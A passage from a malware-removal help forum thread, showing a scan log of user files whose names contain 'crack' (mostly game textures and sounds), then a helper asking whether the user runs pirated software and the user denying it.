c:\program files (x86)\steam\steamapps\common\company of heroes relaunch\moderncombat\data\art\fx\fx_damage\stucco_building_dmg\fx_collapse\panel_crack_group_combo_00.bfx
c:\program files (x86)\steam\steamapps\common\company of heroes relaunch\moderncombat\data\art\fx\fx_damage\wood_building_dmg\fx_collapse\panel_crack_wood_group_combo_00.bfx
c:\program files (x86)\steam\steamapps\common\dishonored\dishonoredgame\localization\int\dlc07_pckp_crackedbonecharms.int
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\immersion_sounds_-_realistic_bullet_cracks_and_whips_216217606.gma
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\keypad_tool_and_cracker_with_wire_support_108424005.gma
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\css content addon (dec2013)\materials\concrete\prodwllecracked.vmt
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\css content addon (dec2013)\materials\concrete\prodwllecracked.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\hl2 & hl2 dm content addon (dec2013)\materials\glass\glasswindow018a_cracked.vmt
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\hl2 & hl2 dm content addon (dec2013)\materials\glass\glasswindow018a_cracked.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_c.vmt
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_c.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_e.vmt
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_e.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_n.vmt
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_n.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_ne.vmt
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_ne.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_nw.vmt
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_nw.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_s.vmt
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_s.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_se.vmt
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_se.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_sw.vmt
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_sw.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_w.vmt
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\concrete\cracked_w.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\metal\black_floor_metal_cracked01.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\models\props_underground\pressure_door_crack.vmt
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\models\props_underground\pressure_door_crack.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\models\props_underground\pressure_door_crack_normal.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\overlays\tile_crack_stain001a.vmt
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\materials\overlays\tile_crack_stain001a.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\models\container_ride\sidewall_precrack.dx90.vtx
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\models\container_ride\sidewall_precrack.mdl
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\models\container_ride\sidewall_precrack.vtx
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\models\container_ride\sidewall_precrack.vvd
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\models\props_underground\cracked_wall.dx90.vtx
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\models\props_underground\cracked_wall.mdl
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\models\props_underground\cracked_wall.phy
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\models\props_underground\cracked_wall.vtx
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\models\props_underground\cracked_wall.vvd
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\models\props_underground\pressure_door_crack.dx90.vtx
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\models\props_underground\pressure_door_crack.mdl
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\models\props_underground\pressure_door_crack.vtx
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\addons\portal 2 content addon\models\props_underground\pressure_door_crack.vvd
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\download\materials\models\crack_machine\ads_1.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\download\materials\models\crack_machine\ads_1_dupe.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\download\materials\models\crack_machine\ads_2.vtf
c:\program files (x86)\steam\steamapps\common\garrysmod\garrysmod\download\materials\models\crack_machine\ads_art.vtf
c:\program files (x86)\steam\steamapps\common\magicka\content\levels\textures\surface\nature\ground\dirt01_cracked_0.xnb
c:\program files (x86)\steam\steamapps\common\magicka\content\levels\textures\surface\nature\ground\dirt01_cracked_nrm_0.xnb
c:\program files (x86)\steam\steamapps\common\magicka\content\levels\textures\surface\structure\stone\floor_cracks_0.xnb
c:\program files (x86)\steam\steamapps\common\magicka\content\levels\textures\surface\structure\stone\floor_cracks_nrm_0.xnb
c:\program files (x86)\steam\steamapps\common\magicka\content\levels\textures\surface\structure\stone\pillar_cracked00_0.xnb
c:\program files (x86)\steam\steamapps\common\magicka\content\levels\textures\surface\structure\stone\pillar_cracked00_nrm02_0.xnb
c:\program files (x86)\steam\steamapps\common\magicka\content\levels\textures\surface\structure\stone\wall_cracked00_0.xnb
c:\program files (x86)\steam\steamapps\common\magicka\content\levels\textures\surface\structure\stone\wall_cracked01_0.xnb
c:\program files (x86)\steam\steamapps\common\magicka\content\levels\textures\surface\structure\stone\wall_cracked_nrm_0.xnb
c:\program files (x86)\steam\steamapps\common\men of war assault squad\mods\campaign\resource\texture\land\dirt\cracked_ground.dds
c:\program files (x86)\steam\steamapps\common\men of war assault squad\mods\campaign\resource\texture\land\dirt\cracked_ground02.dds
c:\program files (x86)\steam\steamapps\common\men of war assault squad\mods\campaign\resource\texture\land\dirt\cracked_ground03.dds
c:\program files (x86)\steam\steamapps\common\men of war assault squad\mods\campaign\resource\texture\land\grass\cracks_grass.dds
c:\program files (x86)\steam\steamapps\common\natural selection 2\ns2\cinematics\vfx_materials\decals\shockwave_crack.dds
c:\program files (x86)\steam\steamapps\common\natural selection 2\ns2\cinematics\vfx_materials\decals\shockwave_crack.material
c:\program files (x86)\steam\steamapps\common\natural selection 2\ns2\cinematics\vfx_materials\decals\shockwave_crack_normal.dds
c:\program files (x86)\steam\steamapps\common\natural selection 2\ns2\cinematics\vfx_materials\decals\shockwave_crack_opacity.dds
c:\program files (x86)\steam\steamapps\common\natural selection 2\ns2\cinematics\vfx_materials\decals\shockwave_crack_specular.dds
c:\program files (x86)\steam\steamapps\common\natural selection 2\ns2\models\effects\windowcracks.dds
c:\program files (x86)\steam\steamapps\common\natural selection 2\ns2\models\effects\windowcracks.material
c:\program files (x86)\steam\steamapps\common\natural selection 2\ns2\models\effects\windowcracks.model
c:\program files (x86)\steam\steamapps\common\projectzomboid\media\sound\crackwood.ogg
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\deadcity\floor\blend_shred_crackedconcrete.vmt
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\deadcity\floor\blend_shred_crackedconcrete.vtf
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\deadcity\floor\shred_crackedconcretea.vtf
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\deadcity\floor\shred_crackedconcreteb.vtf
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\models\zp_props\arcade\arcade_crackman1.vmt
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\models\zp_props\arcade\arcade_crackman1.vtf
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\models\zp_props\arcade\arcade_crackman2.vmt
c:\program files (x86)\steam\steamapps\common\source sdk base 2007\zps\materials\models\zp_props\arcade\arcade_crackman2.vtf
c:\program files (x86)\steam\steamapps\common\tinyandbig\assets\bin\scene\crack.scene
c:\program files (x86)\steam\steamapps\common\tinyandbig\assets\sounds\stones\afterlaserstonecrackshort1.ogg
c:\program files (x86)\steam\steamapps\common\tinyandbig\assets\sounds\stones\stonecrack02.ogg
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concretecrack2.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concretecrack2.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concretecrack3.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concretecrack3.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack1.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack1.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack2.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack2.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack3.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack3.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack4.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack4.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack5.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete_large_crack5.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\floorcrack2.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\floorcrack2.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_01.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_01.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_03.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_03.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_04.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_04.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_05.vmt
c:\program files (x86)\steam\steamapps\sourcemods\bms\materials\decals\concrete\crack_05.vtf
c:\program files (x86)\steam\steamapps\sourcemods\bms\models\props_powerup\cinephys_wallcrack.dx80.vtx
c:\program files (x86)\steam\steamapps\sourcemods\bms\models\props_powerup\cinephys_wallcrack.dx90.vtx
c:\program files (x86)\steam\steamapps\sourcemods\bms\models\props_powerup\cinephys_wallcrack.mdl
c:\program files (x86)\steam\steamapps\sourcemods\bms\models\props_powerup\cinephys_wallcrack.sw.vtx
c:\program files (x86)\steam\steamapps\sourcemods\bms\models\props_powerup\cinephys_wallcrack.vvd
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneye\archives\decal_cracks01.vmt
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneye\archives\decal_cracks01.vtf
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneye\archives\decal_cracks02.vmt
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneye\archives\decal_cracks02.vtf
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneye\temple\crackedrock.vmt
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneye\temple\crackedrock.vtf
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneye\temple\crackedrock_normal.vtf
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneyedecals\wall_crack01.vmt
c:\program files (x86)\steam\steamapps\sourcemods\gesource\materials\goldeneyedecals\wall_crack01.vtf
c:\users\rarwolf\appdata\local\google\chrome\user data\default\local storage\http_www.cracked.com_0.localstorage
c:\users\rarwolf\appdata\local\google\chrome\user data\default\local storage\http_www.cracked.com_0.localstorage-journal
c:\users\rarwolf\appdata\local\play withsix\tools\mingw\bin\ssh-keygen.exe
c:\users\rarwolf\appdata\local\roblox\versions\version-58bb25d673384171\content\textures\vol_ice_cracked2.dds
c:\users\rarwolf\appdata\local\virtualstore\program files (x86)\pivot stickfigure animator\stick figures\pivot\stick figures\wu folder\crackling wu.stk
c:\users\rarwolf\appdata\local\virtualstore\program files (x86)\pivot stickfigure animator\stick figures\pivot\stick figures 2\background accessories\crack2_piv2.stk
c:\users\rarwolf\appdata\local\virtualstore\program files (x86)\pivot stickfigure animator\stick figures\pivot\stick figures 2\background accessories\crack_sidewaysbox.stk
c:\users\rarwolf\appdata\local\virtualstore\program files (x86)\pivot stickfigure animator\stick figures\pivot\stick figures 2\background accessories\buildings\crack.stk
c:\users\rarwolf\rar\pivot animator\stick figures\stick figures\wu folder\crackling wu.stk
scanner sequence 3.ZZ.11.EBLBA0
 ----- EOF ----- 


#14 Naathim

Naathim

    Bleepin' Minion


  • Members
  • 435 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Poland
  • Local time:07:20 AM

Posted 27 October 2014 - 07:54 AM

Say... are you using pirated software? :rolleyes:


Radek Naathim Pawelczyk

Malware Removal Specialist

 

staff.png


#15 RaRWolf

RaRWolf
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:01:20 AM

Posted 27 October 2014 - 08:18 PM

No, I'm not.






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users